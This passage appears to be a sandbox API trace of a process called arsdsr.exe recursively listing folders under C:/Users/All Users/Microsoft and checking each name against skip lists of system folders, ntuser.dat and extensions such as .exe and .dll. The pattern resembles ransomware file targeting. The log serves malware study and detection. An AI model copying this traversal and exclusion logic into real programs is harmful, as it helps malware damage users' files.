ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.171] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.171] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0144.171] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.171] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.171] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 1 [0144.171] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2=".") returned 1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="..") returned 1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="...") returned 1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="windows") returned -1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="$recycle.bin") returned 1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="rsa") returned -1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="ntuser.dat") returned -1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="programdata") returned -1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="appdata") returned 1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="program files") returned -1 [0144.172] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="program files (x86)") returned -1 [0144.172] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\" [0144.172] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\", lpString2="ApplicationViewsRootNode" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" [0144.172] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\" [0144.172] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\" [0144.172] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*") returned="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*" [0144.172] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680066, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0144.172] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.172] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680066, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0144.173] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.173] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.173] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680066, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 0 [0144.173] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0144.173] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 0 [0144.173] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0144.173] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Views", cAlternateFileName="")) returned 0 [0144.173] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.173] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2=".") returned 1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="..") returned 1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="...") returned 1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="windows") returned -1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="$recycle.bin") returned 1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="rsa") returned -1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="ntuser.dat") returned -1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="programdata") returned -1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="appdata") returned 1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="program files") returned -1 [0144.173] lstrcmpiW (lpString1="IdentityCRL", lpString2="program files (x86)") returned -1 [0144.173] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.173] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="IdentityCRL" | out: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL") returned="C:/Users\\All Users\\Microsoft\\IdentityCRL" [0144.174] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\") returned="C:/Users\\All Users\\Microsoft\\IdentityCRL\\" [0144.174] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\IdentityCRL\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\") returned="C:/Users\\All Users\\Microsoft\\IdentityCRL\\" [0144.174] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned="C:/Users\\All Users\\Microsoft\\IdentityCRL\\*.*" [0144.174] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\IdentityCRL\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.174] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.174] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.174] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.174] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.174] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd591378b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd591378b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac29de1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="ppcrlconfig.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0144.174] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2=".") returned 1 [0144.174] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="..") returned 1 [0144.174] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="...") returned 1 [0144.174] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="windows") returned -1 [0144.174] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="$recycle.bin") returned 1 [0144.174] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="rsa") returned -1 [0144.174] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="ntuser.dat") returned 1 [0144.174] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="programdata") returned -1 [0144.175] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="appdata") returned 1 [0144.175] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="program files") returned -1 [0144.175] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="program files (x86)") returned -1 [0144.175] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\IdentityCRL\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\") returned="C:/Users\\All Users\\Microsoft\\IdentityCRL\\" [0144.175] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="ppcrlconfig.dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned="C:/Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" [0144.175] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.175] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.175] PathFindExtensionW (pszPath="ppcrlconfig.dll") returned=".dll" [0144.175] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0144.175] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0144.175] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0144.175] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0144.175] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0144.175] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0144.175] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0144.175] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0144.175] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 1 [0144.175] lstrcmpiW (lpString1="ppcrlui.dll", lpString2=".") returned 1 [0144.175] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="..") returned 1 [0144.175] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="...") returned 1 [0144.175] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="windows") returned -1 [0144.175] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="$recycle.bin") returned 1 [0144.175] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="rsa") returned -1 [0144.175] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="ntuser.dat") returned 1 [0144.175] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="programdata") returned -1 [0144.176] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="appdata") returned 1 [0144.176] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="program files") returned -1 [0144.176] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="program files (x86)") returned -1 [0144.176] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\IdentityCRL\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\") returned="C:/Users\\All Users\\Microsoft\\IdentityCRL\\" [0144.176] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="ppcrlui.dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned="C:/Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll" [0144.176] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.176] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.176] PathFindExtensionW (pszPath="ppcrlui.dll") returned=".dll" [0144.176] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0144.176] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0144.176] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0144.176] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0144.176] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0144.176] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0144.176] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0144.176] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0144.176] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 0 [0144.176] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.176] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0144.176] lstrcmpiW (lpString1="Media Player", lpString2=".") returned 1 [0144.176] lstrcmpiW (lpString1="Media Player", lpString2="..") returned 1 [0144.176] lstrcmpiW (lpString1="Media Player", lpString2="...") returned 1 [0144.176] lstrcmpiW (lpString1="Media Player", lpString2="windows") returned -1 [0144.176] lstrcmpiW (lpString1="Media Player", lpString2="$recycle.bin") returned 1 [0144.177] lstrcmpiW (lpString1="Media Player", lpString2="rsa") returned -1 [0144.177] lstrcmpiW (lpString1="Media Player", lpString2="ntuser.dat") returned -1 [0144.177] lstrcmpiW (lpString1="Media Player", lpString2="programdata") returned -1 [0144.177] lstrcmpiW (lpString1="Media Player", lpString2="appdata") returned 1 [0144.177] lstrcmpiW (lpString1="Media Player", lpString2="program files") returned -1 [0144.177] lstrcmpiW (lpString1="Media Player", lpString2="program files (x86)") returned -1 [0144.177] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.177] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Media Player" | out: lpString1="C:/Users\\All Users\\Microsoft\\Media Player") returned="C:/Users\\All Users\\Microsoft\\Media Player" [0144.177] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Media Player", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Media Player\\") returned="C:/Users\\All Users\\Microsoft\\Media Player\\" [0144.177] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Media Player\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Media Player\\") returned="C:/Users\\All Users\\Microsoft\\Media Player\\" [0144.177] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Media Player\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Media Player\\*.*") returned="C:/Users\\All Users\\Microsoft\\Media Player\\*.*" [0144.177] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Media Player\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.177] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.177] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.177] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.177] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.177] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 0 [0144.177] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.178] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MF", cAlternateFileName="")) returned 1 [0144.178] lstrcmpiW (lpString1="MF", lpString2=".") returned 1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="..") returned 1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="...") returned 1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="windows") returned -1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="$recycle.bin") returned 1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="rsa") returned -1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="ntuser.dat") returned -1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="programdata") returned -1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="appdata") returned 1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="program files") returned -1 [0144.178] lstrcmpiW (lpString1="MF", lpString2="program files (x86)") returned -1 [0144.178] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.178] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="MF" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF") returned="C:/Users\\All Users\\Microsoft\\MF" [0144.178] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MF", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\") returned="C:/Users\\All Users\\Microsoft\\MF\\" [0144.178] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\MF\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\") returned="C:/Users\\All Users\\Microsoft\\MF\\" [0144.178] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MF\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\*.*") returned="C:/Users\\All Users\\Microsoft\\MF\\*.*" [0144.178] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\MF\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.179] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.179] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.179] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.179] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.179] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2=".") returned 1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="..") returned 1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="...") returned 1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="windows") returned -1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="$recycle.bin") returned 1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="rsa") returned -1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="ntuser.dat") returned -1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="programdata") returned -1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="appdata") returned -1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="program files") returned -1 [0144.179] lstrcmpiW (lpString1="Active.GRL", lpString2="program files (x86)") returned -1 